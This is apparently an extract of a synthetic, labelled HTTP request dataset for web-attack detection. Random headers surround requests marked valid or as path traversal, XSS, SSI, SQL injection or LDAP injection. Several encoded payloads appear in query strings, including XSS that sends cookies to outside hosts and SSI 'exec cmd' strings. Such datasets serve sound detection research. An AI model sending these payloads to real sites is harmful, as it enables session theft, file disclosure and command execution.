Date: Wed, 01 Oct 08 19:04:47 GMT
ETag: "F86ay-VLECrx@PuC"
Expect: ei9Ox7pc
From: hfdEce@idsekiij.com
If-Modified-Since: Tue, 04 May 04 22:39:35 UTC
If-Unmodified-Since: Sat, 21 May 05 11:49:28 GMT
If-Match: "v6Nui5R543FCWR1"
If-None-Match: *
If-Range: "jAVCALjkpPKw3h85h@"
Max-Forwards: 73
MIME-Version: 3.2
Pragma: brce0c=isj
Proxy-Authorization: Digest opaque="etlet5"
Authorization: NTLM aGVla2Vpc2lsaWFkbnFpcGN2b2lobnlzbmVpZ2pocmV1bw==
Range: 152369-
Referer: http://kt0s.st/soYmss.aspx
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/2.3 (compatible; Konqueror/7.1; Windows NT; pAlefnen; tsricayO0o)
UA-CPU: StrongARM
UA-Disp: 498,069,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7528x1732
Via: hdxo/3.3 88.76.145.229, 3.7 251.38.222.111, FTP/0.6 www.Ssaealr.js:48045
Transfer-Encoding: compress
Upgrade: q6rhe/7.3, trtpf6/8.5, anodm/1.3, eae/9.5, 7iedfn/9.2
Warning: 785 www.apO2.jpg "aezleOae" "Tue, 27 Mar 07 08:50:08 CET"
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 274973050
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lheiufzwl=y Oewm&een3=5&eihmweTTddt6tr0=tKR&srvma4tHtehnsmn=4&X6tmpcdeleteQYSb=62449350

End - Id: 34481
Start - Id: 5067
class: Valid
POST /on9soNinwT/gNGcVRnHPdDQ.css? HTTP/1.1
Content-Length: 186
Content-Language: axuE,e,n
Content-Encoding: compress
Content-Location: /eclNij.swf
Content-MD5: bDk2YmJ3UmV0b1Jyc25ubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 May 08 24:52:37 GMT
Last-Modified: Fri, 26 Dec 08 11:43:43 CET
Host: www.L8ojievo.org
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.9, cp-932;q=0.9
Accept-Encoding: 
Accept-Language: dqeeT-c;q=0.9, 6iS-iOmEnreh, gpoad-sdsnklih, is-Cafzraae;q=0.6, ee9rvi-7bn;q=0.6
Cache-Control: min-fresh=2
Client-ip: 53.64.21.162
Cookie: tacwheti2whcp=5;6ThhA=jiQSFnPHHq;WpbinetCeodw=ts5ra9tnna0yE;lenpp7hoioie=71;8.XcSq3GL2H=4;e5ono=7292
Cookie2: $Version="684"
Date: Sat, 10 Jan 09 19:07:14 CET
ETag: "ysQeb7HLdpYvo.M2T"
Expect: 100-continue
From: adhno@nitwillnza.be
If-Modified-Since: Tue, 05 Oct 04 05:19:37 CET
If-Unmodified-Since: Thu, 20 Sep 07 16:16:31 GMT
If-Match: "Tiqju.UdXgXHv8bdwVbg"
If-None-Match: "Z3zpJizC0k65McRw"
If-Range: *
Max-Forwards: 929
MIME-Version: 8.8
Pragma: nda=iP4o8twc
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Digest nc=F2d7aDbd
Range: 818-,7964-381
Referer: http://breoeni.de/nbeooe/derhoc.asmx
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.2 (X11; U; Open BSD i586 9.8; 8n-or; rv:5.0.7) Gecko/30261736
UA-CPU: PowerPC
UA-Disp: 925,165,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7508x091
Via: 4.9 www.rehrpc.jpeg, FTP/8.7 206.120.54.38, HTTP/6.2 106.101.120.60
Transfer-Encoding: deflate
Upgrade: fnget0/9.0, Hrn/8.2
Warning: 467 150.166.100.47 "uemut595tnsdte" "Mon, 06 Dec 04 06:40:13 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

gcntlao=hSrh0e&Yrcht=Oeino s&eabel=0&le4n8usie5=lyovubint0ceoyMm&i5e3=ieoqwOewmrinYgq&tistdsosA=nttadfmwsiaOee&u4Sd=3974808&niEaeezettr0oi=reu=ceem&7momih=c+connectYd&ryobwoomwafn=3p

End - Id: 5067
Start - Id: 45767
class: PathTransversal
GET /9lmr.dll?Oe6eTTimylbosa=e5iev-tdZM&oall=hsReu&gmochaLVmlV@vPRQ=acxml&1Uon5imm=563&rneghe1ssrtid=lstdinvar&ghetekhdolHSst=03927&etgmmilrtr=dnoo&yqisSj=nzTo&dlii=ie+%3CeBe4ssat&ci3unE=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&wtelnetS7J.JEKkt=si%3B-an+oo HTTP/1.1
Host: www.6dsarrt.de
Connection: tnnh3e
Accept: text/*;q=0.6
Accept-Charset: shift_jis
Accept-Encoding: *;q=0.6
Accept-Language: buo-t0x, v2o4m-enh3, ilue9uh-u0foee;q=0.3, hhl-mih;q=0.3
Cache-Control: min-fresh=4
Client-ip: 20.215.35.161
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Fri, 14 Sep 07 22:19:53 CET
ETag: W/"ZuCaxTopQAS6sIGZ4"
Expect: evdontue
From: dsxeHs@whobloehb.be
If-Modified-Since: Wed, 11 Mar 09 15:21:02 GMT
If-Unmodified-Since: Wed, 23 Feb 05 03:01:45 GMT
If-Match: *
If-None-Match: *
If-Range: "pdwVr123vZIeXZeAbA"
Max-Forwards: 308
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Ores eEtpwyE4=Eninloeo
Range: -500252,934-3694
Referer: http://aopsTid.be/witpu.dll
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Qln9e2l (elou-@; c6H_WUGsu; i5-d.T5; tfgOhfcpw)
UA-CPU: 68000
UA-Disp: 517,832,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 9.4 236.146.42.68
Transfer-Encoding: identity
Upgrade: pvn3h/3.4, legdk6/8.9, d1wenn/6.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 217.11.93.180
X-Serial-Number: 5959177395
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45767
Start - Id: 47029
class: XSS
GET /omn/c5@kHVk3_JR8vIvl/5a/omiiesldrsr/oJfL-MUBpe-t0k5E9nuL/flvvnooFMiOIx/t-@oiAJs_y/dgX3xvNpVeqK8Vo--b/_09XY1.bin?2lpno9mat=00722330&ovt=%26%3C&yvi=%3C%3Cscript++++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.as.com%2Fcgi-bin%2Finnianor.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E HTTP/1.0
Host: 109.236.46.163:80
Connection: Eolee
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesesimp, windows-1251
Accept-Encoding: *
Accept-Language: mjewteu-waeeeqr
Cache-Control: no-transform
Client-ip: 170.28.161.6
Cookie: agtlevklkf=a3;bsbuFah7hoett=e5PLl@owch9
Cookie2: $Version="7"
Date: Wed, 13 Dec 06 03:24:31 UTC
ETag: "gHWmyyEWa2M7g1jeAj39"
Expect: ntdeN6d
From: Desiah@eghc.be
If-Modified-Since: Sat, 02 Aug 08 17:47:31 GMT
If-Unmodified-Since: Sun, 26 Jun 05 03:51:02 GMT
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "szarhDVDUDo.5StC6mV"
Max-Forwards: 8
MIME-Version: 5.6
Pragma: helDehEf='Sa'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: rsea euEe=nwshmd
Range: 1054-5
Referer: http://www.tldt.de/ourbrdS4/iyne/Beo7ie/aqov1/reatthe.msf
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.1 (compatible; MSIE 1.8; Open BSD i586; udoDer; lanatnzei; eresfesnhn)
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: FTP/4.9 45.69.40.78, 9bet/6.7 www.hwd3s6.htm, 6.8 www.eLirlO.html
Transfer-Encoding: deflate
Upgrade: tlmcr/4.0, ihaNi/9.2, ezosme/6.2
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47029
Start - Id: 189
class: Valid
GET /Cts/axWohuwDxIxhjPVw/9rhhAsninectmett/nFItjp/ire18sttjeynroeee9nu.png?ns3Icmpep=17964&eit=ihapd&ThthjNcid=3&haesu2rae=s%40Vh9gs&Lnull6G0=p%2F2m%7Ebtllogdmj&u4r=7985338&gU@J0OQY.8V=rnEt HTTP/1.1
Host: 12.61.27.177
Connection: dnOpqtd
Accept: audio/basic;q=0.3, image/*;q=0.2, image/*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.5, gzip, compress
Accept-Language: mE1-Pat;q=0.1, 7LscA-ior;q=0.6, e-dm, dsli-htd;q=0.9, euSh-kfevhi;q=0.6
Cache-Control: no-transform
Client-ip: 64.219.87.91
Cookie: leie6v=tJwUMEuurA7;RGcLbingdelete=<y?drop
Cookie2: $Version="529"
Date: Thu, 21 Aug 08 14:12:14 GMT
ETag: "YnweNoiNKUDiCQoZ"
Expect: 100-continue
From: dcet@elLtesue.uk
If-Modified-Since: Fri, 17 Oct 08 24:27:08 GMT
If-Unmodified-Since: Sat, 16 Jun 07 06:57:35 CET
If-Match: "i4GoY@lvgYCEKsz"
If-None-Match: "v4WiJOYVmRwC5.Ir"
If-Range: Fri, 23 Mar 07 01:05:36 UTC
Max-Forwards: 007
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: cbsUe 7REtn=0cTt
Authorization: Basic Y2U3QnE6Y29kbHR0bw==
Range: 534828-
Referer: http://zReflhhn.it/eCikg/h7rwl.shtml
TE: trailers
Trailer: Accept
User-Agent: roM5RX http://www.rrgeslh.uk
UA-CPU: StrongARM
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4314x599
Via: FTP/0.6 www.Neuesis.shtml
Transfer-Encoding: compress
Upgrade: ahei/7.4, ea4eeh/0.5, diptss/4.0, ensoe3/8.3
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 189
Start - Id: 32745
class: Valid
POST /enXot2nSa5O8VlZ.WbF/oAo./6e-SservicesNB_aB/4KWm5-@Xaccess_loggw/hnsnmuwsnhn/lZHx/etBzh0/ithNdtntT1euyaot/yn64cIt4ccvDoXKmMBJd/cnnyob.nsf? HTTP/1.1
Content-Length: 48
Content-Language: n,tYaqc
Content-Encoding: identity
Content-Location: /nontly2/hodner.css
Content-MD5: bm1mZGF0dGJ0Y242c3N1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Nov 07 14:31:08 GMT
Last-Modified: Wed, 28 Jul 04 13:16:22 GMT
Host: www.trih1ilr.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: s-rsreee, rre-sogieonw;q=0.7
Cache-Control: r0='lehPumq'
Client-ip: 33.225.104.136
Cookie: 6und=dtetelePneenmerr1
Cookie2: $Version="20"
Date: Mon, 25 Sep 06 20:15:58 UTC
ETag: "DQIA4FNXk3bUu6jCig"
Expect: meAIe
From: ynuuOeYe@e4oe.com
If-Modified-Since: Sat, 15 Jan 05 07:07:19 GMT
If-Unmodified-Since: Thu, 27 Oct 05 11:30:01 CET
If-Match: "A8AUtW91fzUj0GU@"
If-None-Match: *
If-Range: Sun, 27 Jul 08 17:18:04 GMT
Max-Forwards: 3
MIME-Version: 2.1
Pragma: s3nrwt=e
Proxy-Authorization: Digest qop=igkvtyr
Authorization: Basic OXVuYTpuc2ww
Range: -0
Referer: http://bqsE.fr/ndtia3t.jpg
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.9 (compatible; Konqueror/5.4; Win 9x; m6wEv)
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1032x4856
Via: FTP/3.2 www.mkIaes.png, 2.7 231.206.184.11
Transfer-Encoding: deflate
Upgrade: ndu/3.8
Warning: 192 5.69.98.20 "aslrVau" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 16114956793159
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

4teterrsinnat=ne@p&Eiodauheh=O0sA5sKdgskzesqI3

End - Id: 32745
Start - Id: 40334
class: SSI
GET /Wjhatesl/jmcpotubfsyB6iymCxnd/ltjevarmZP/tsbt7hi1hu/eA1hbPnR/tO6K3N4drtHvyGB1DO0/ew6w6i9ucrspshee/rZ-_zL/epd/iIijgepdoer/il6Hqer95lLDtwlnygD.swf?aIubG4uo=0pQmeesey&uus93arxle=885938&TxtbtlceUhf=5279983&Oehljti=2057&elw9cstDtct=di4nAoSseeioho&deea1dtuaReg=7319624&9ehir8e=qt5gtn+%2Fpacu9&gieeofedhOaqnse=svU4q&neegry=642&rnei=ke9lUea9EEixlm&i7cle=%3C%21--+++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CujEevyh3Lr%5CiNmt%5Cwl.exe+++++d%3A%5Ckdgueg%5Cwww.stanitinde.org%5C3stNoGeAb%5Cdatabase.mdb+++++%2Fx++exporttofoxpro%22--%3E HTTP/1.0
Host: 149.158.223.226
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: maaplnq-oiqS8isi;q=0.8, sseao-xaS, Mdu-1;q=0.2, t-s0t;q=0.5, iMaho-1mrk;q=0.1
Cache-Control: no-store
Client-ip: 227.85.148.49
Cookie: Tq4A5L=7wthltta
Date: Fri, 06 Jul 07 11:01:10 CET
ETag: "-2SnMmPGNUPDo6afli"
If-Modified-Since: Tue, 03 Feb 09 19:11:07 UTC
If-Unmodified-Since: Sun, 11 Nov 07 18:38:01 UTC
If-Match: "IZWqUom1JzycPKGZ"
If-None-Match: *
If-Range: Tue, 27 Jan 04 11:57:36 UTC
Max-Forwards: 1663
MIME-Version: 3.8
Pragma: TrzeibRe='ramk89'
Authorization: Digest qop=auth
Range: -636724,210954-
Referer: /naa9.mdb
TE: deflate;q=0.6,gzip
User-Agent: Mozilla/0.0 (compatible; MSIE 0.5; WinNT; eN4idlos)
UA-Disp: 041,313,32
UA-Pixels: 384x228
Via: FTP/7.9 www.tyLb.html
Transfer-Encoding: identity
Warning: 159 www.sK2gz.js "resE1stsdnq" "Fri, 29 May 09 15:41:02 GMT"
X-Forwarded-For: 42.162.17.85
X-Serial-Number: 22985

null

End - Id: 40334
Start - Id: 46979
class: XSS
GET /ob4on2vtinqCehrtEefl/tlilxena9yOn.php3?br1heairfr5o=%3Cimg+src+++%3D+%22+++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F152.54.228.101%2Friis.mdb%27%2Bdocument.cookie%29%3B%5D++++%22++%3E&ss=s+5c7ehxFtc6&7Now8lfiR=copySie&eio2eunsd=tara&ptih9alna3b=02173 HTTP/1.1
Host: 159.10.71.22
Connection: esispoo
Accept: */*;q=0.7
Accept-Charset: x-mac-icelandic;q=0.2, x-mac-korean;q=0.9, x-mac-arabic
Accept-Encoding: identity, compress;q=0.5, identity
Accept-Language: afooli-5ln, eide-ezytget;q=0.8
Cache-Control: no-cache
Client-ip: 248.231.55.234
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Sun, 20 Dec 09 12:30:15 GMT
ETag: W/"1RB7F6M.D6iD7VDJ1x"
Expect: lirmAu=bfd2
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Wed, 01 Oct 08 22:51:45 GMT
If-Unmodified-Since: Wed, 18 Feb 04 02:05:38 UTC
If-Match: "hOxhtMCvVseiRGi2K"
If-None-Match: *
If-Range: *
Max-Forwards: 407
MIME-Version: 0.1
Pragma: ihnH=igttas
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: /s4ejm.pdf
TE: deflate
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 8.8; vd-ee; rv:0.2.6) Gecko/82889869
UA-Disp: 2976,173,32
UA-Pixels: 199x2885
Via: 3.9 www.eceg5aat.html
Transfer-Encoding: gzip
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 174.206.213.130
X-Serial-Number: 09560109
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46979
Start - Id: 6138
class: Valid
POST /tB/h-ZWXbz/3ihj8art/init/3Li.-_i_XwnGVVobki/rch4qso6neeree/bdworqtel/mf0wOXj6x@sNg/8p2IDsPm7.H1d.tiff? HTTP/1.0
Content-Length: 136
Content-Language: epc66
Content-Encoding: identity
Content-Location: http://www.buboesws.uk/o39Sm/p4eR7P/Ezrwne/jorysl.jsp
Content-MD5: c3FldDhlaXNueWF0ZXRpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Mar 09 06:02:07 GMT
Last-Modified: Wed, 24 Oct 07 03:36:13 GMT
Host: www.aonnhnIoI.cz
Connection: bhtdo5ya
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale=426
Client-ip: 124.193.73.246
Cookie: DsSye0lr=sod4okttf;Ychttpyo1l=OrdND dim5iae]nwpsht
Cookie2: $Version="52"
Date: Tue, 31 Jan 06 17:12:20 GMT
ETag: "jyQFaH4RlKaw88i"
Expect: meaF=Ewr0e;un9o=eexf1
From: arnac8@nERnnE.be
If-Modified-Since: Fri, 11 Jul 08 24:53:22 CET
If-Unmodified-Since: Fri, 29 Jun 07 10:46:51 GMT
If-Match: "T8f.ngLVsvzYE8u"
If-None-Match: *
If-Range: *
Max-Forwards: 6214
MIME-Version: 4.3
Pragma: tosxeNhh='t'
Proxy-Authorization: Digest algorithm=cedo
Authorization: NTLM bmVjZWZsb290bGFpaGN2OWt1ZXJ1cG5kVHRyYWJmYXM5c3V1dG55aA==
Range: 611533-,1458-075
Referer: /o0ht/szriejU6/h89tsea/estFo.mpeg
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 0.7; yq-rh; rv:8.3.0) Gecko/80842382
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x3655
Via: ssrBki/8.3 www.ehwotOrf.css:0, n7u/4.8 75.173.204.193, FTP/9.9 www.Eleoifut.css:7
Transfer-Encoding: deflate
Upgrade: pnds/8.6
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

tntasnat1smeee=40791&aefReteog9=856193&chbs3n=Ehsm&hifcth=uCpORRh&In9nos8ontno=7&eee=1pobV4W-EaUw&io7r= eu&BB.Sa=07&tatIws3wtnerseo=G$

End - Id: 6138
Start - Id: 39987
class: SSI
GET /zeagpPmlhct/bwsyXwindow.openqgroup by4asd/htsdentNpaTpitu/FcC0.-J/enMgtl8k/mWA83U.s5sMPrvQZSo/enhsJ2OmHl8MRSDuV4S/SzehyxeauUy/qAN./tw2hotah8ehtde5o/u8pqCN5bZWAy6.5I-POg.jpg?eri=4682630963&ioeerynqor7=eBJb&lnn=eii0&%uoBHEpsuOofSW=m6anluredeRBqgy6i&eOinV-CWdy7=%7CIwhs%29n&sef5uc=opt&Sm5SAd2=psuYQ&i2Wlusrw=%3C%21++%23%3C%21--++++%23exec+cmd%3D%22id%22--%3E HTTP/1.1
Host: www.nnstiemesu.gov
Connection: keep-alive
Accept: video/*, image/*, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, compress;q=0.3
Accept-Language: auettxr-erEibpa, u47att-tar, epeitiee-waerl1, piteceem-7;q=0.1, eaeaty-penehe
Cache-Control: no-transform
Client-ip: 190.94.5.54
Cookie: khuleoeslNoy= d;hstlvetqhoemea=a l;1rlftl=8064305801;ojoudebegl5iao=aOqeifrDrRTin;bx1h2axbyN7acw5=0
Cookie2: $Version="941"
Date: Fri, 14 Oct 05 02:17:54 UTC
ETag: W/"_bPQwMT@Vkx-eIVQ"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Wed, 07 Jun 06 10:15:30 GMT
If-Match: "6AskQWSjUK2L0ELehe62"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: rif6 vouldi6f=5txo2
Range: 618-573,4-,461-
Referer: /keEa/sE5lbr/EIya.txt
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: ettHGfsjmp0
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 860x1351
Via: FTP/9.9 www.ntaTad.shtml
Transfer-Encoding: deflate
Upgrade: ptgi/5.0, Tpaeet/6.5
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39987
Start - Id: 42343
class: SqlInjection
GET /k6YV2iGAN@gcL6iO3/dtmfGSsettyeleOaSl/sduooeiyo68tcsxcs/9.2kQ@M945fIdn3GsX-/pAahwihnr/z@dPL/hx_tqes2tGNpZ/ndiar.html?ns4eot3edtnxnee=EltEpatn&ceqashero=7657134&jtF=aeiygloais&encC1Z6=i84AmorisT&ldThsHlmel=gsirtg&eoene=OrigText%27OR%27idnSnt%27++++%3D++%27jMi%27&1enyqoilo=arlEeetsl&9ll=document0tdoqGEicet6&rssae=131&qenoutmwace0x=66497735&ds3iugssod1a0ii=7ba&oktvhaeil=%7C&xZPo=%2Bcatnlsei%40susw+xp_&hYT7TXB=npuRn0emp HTTP/1.0
Host: www.i9irhln.com
Connection: 6qaa
Accept: image/jpeg;q=0.7
Accept-Charset: hz-gb-2312;q=0.5, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 234.69.56.127
Cookie: likeuM8D=9250156;8tirCslhofs=qtiWeie4(;ttypo=140058;pDirveiwgans=r-B-8Kv9tN;sGrf=ih(mnt5|il8fetcs0siAo
Cookie2: $Version="054"
Date: Wed, 11 Apr 07 03:40:02 CET
ETag: W/"W3Dl8Wik9y5E8q13ewRG"
Expect: 100-continue
From: DiEa@y1ebyi.uk
If-Modified-Since: Sun, 12 Jul 09 03:08:24 CET
If-Unmodified-Since: Tue, 07 Sep 04 09:19:21 CET
If-Match: *
If-None-Match: "4dzFvPJ7-3442tcmPWv"
If-Range: Wed, 09 Jul 08 24:27:17 UTC
Max-Forwards: 5345
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: nrRny etsaey=elewdabt
Authorization: baldw 1aneseaa=tt40ou
Range: -42018,-510767
Referer: http://wa5mQn.be/uaGeedc/tuEta.dll
TE: gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: nwohaIsid (h9F46uPIgQ; ejaOjjwRF)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: 6.0 212.102.218.17:00182, 6.6 www.ttrhhrn.jpg, HTTP/6.2 www.aoasi.jpg
Transfer-Encoding: deflate
Upgrade: eEtha/8.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 51653386435804651
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42343
Start - Id: 38675
class: LdapInjection
GET /nrzin7zunbokR/odjsoyN9aPEn31N/ksmMvFK7SLpIvbM/adbm3Nopkataa/pkpflkXw/slbutsiowww6h38dI/roTsigd22ksje2sp5n/6YWWLjb-Li/ZWtpasswdlinkBOTeu.tiff?5.WC=656312348&8ieah0eAMeatx=lec%29%28++++%7C++++%28ns%3D*%29&eetwaesc=-s+t&WIcp5=sock_stream&enznaidnztao=da%3Fehes+&cisBtug=+smhmND0ahanchild%5D&iXHvNgDKe_=qwi2frnmgi&lsdpue=631&eohinuneareeht=h4eqtsEhd HTTP/1.0
Host: www.0rwzaj.de
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesetrad, iso-2022-kr
Accept-Encoding: identity, compress, identity;q=0.7, deflate;q=0.2
Accept-Language: 8rs-sa3;q=0.8, phArhiwe-9saietr0;q=0.1, 2bepA-teT;q=0.8, tt0rsbc8-tNrt;q=0.8
Cache-Control: no-transform
Client-ip: 64.190.230.209
Cookie: 3rwe13tcdnne=f6e;eiud8Npiwg510=29596;PSVkSZdropyqp=oKApv;H0J8n7E=07813;sAnfE=wRidP
Cookie2: $Version="9"
Date: Fri, 12 Oct 07 05:59:06 GMT
ETag: W/"zJOOArlYXSlq3FpaJBQS"
Expect: eees1
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 06 Mar 05 05:02:56 CET
If-Unmodified-Since: Wed, 02 Aug 06 12:04:44 CET
If-Match: *
If-None-Match: "t1BpX@2ZoM.g3rkLIR0"
If-Range: *
Max-Forwards: 2608
MIME-Version: 9.9
Pragma: rehfi5='bn'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic ZHVlZTM0aG06ZnM4b2g=
Range: 39622-,-9614,-81153
Referer: /sn0iNyo/toEruoE.cfm
TE: chunked;q=0.0
Trailer: Accept
User-Agent: Mozilla/1.2 (compatible; MSIE 8.8; Linux i386; nDeiahkws; tUezte; o8p9idT)
UA-Disp: 0550,3953,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7709x7356
Via: 7.0 www.zsiha.jpeg, HTTP/2.0 203.199.100.136
Transfer-Encoding: identity
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 0.228.238.16
X-Serial-Number: 7677444389981478018
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38675
Start - Id: 41915
class: SqlInjection
GET /irc/nhBdtxa/ZVf/sEvy.mspx?oovrlhwtoN=89507&5eonn7g=hB_OXBt-E&gheqwyt=i.DT_laoHuZ&3yer=g4&bovzmerA=%2Fdf%7EpassthrunodelFincludessxn&uueitzzwv=E5nef&oatuu=2%24&Rhrbwservices8=%27+%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F34877%2F**%2FFROM%2F**%2Fanisdetls%2F**%2FWHERE%2F**%2F%28%27%27+++%3D%27++++%2F**%2F&Wienalsiprah=amwid&wheretHK0ikchildNz=17093806&welue0=liSnTm2 HTTP/1.0
Host: www.nnxiaooB.net
Connection: airsdk
Accept: video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: n4doae-ulodynl
Cache-Control: max-stale=49170
Client-ip: 21.123.50.241
Cookie: dmetab= hon;3Hepnel=asht67aa;heo1ginlhDerl=linkiaDCInode|c'h
Cookie2: $Version="8"
Date: Thu, 08 Feb 07 06:37:01 GMT
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: PtDlsore@tsfosgnuwd.be
If-Modified-Since: Wed, 09 Apr 08 01:18:03 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: "goGjbVh2jWqePEZQ@QBg"
If-None-Match: "FLniRs4OXG-IjWx8QpuS"
If-Range: *
Max-Forwards: 2674
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic Z250RmVlOmVlaG9scnll
Authorization: nini Hync=6Ipcvma
Range: -0
Referer: /troe5/tt86nre/zeeeDier/cwartnl/ehaXeS.php4
TE: gzip
Trailer: Via
User-Agent: hoel (lO14M@8L8-)
UA-CPU: Sparc
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: ncsa/7.4 119.155.181.203, HTTP/2.4 11.194.61.13, c3Lu/3.5 www.aaeifd.css:5
Transfer-Encoding: 0dFe; fwLlo=trea3eht
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 206 www.hpaefstE.jpg "2ytytu1" "Wed, 13 Sep 06 14:39:38 GMT"
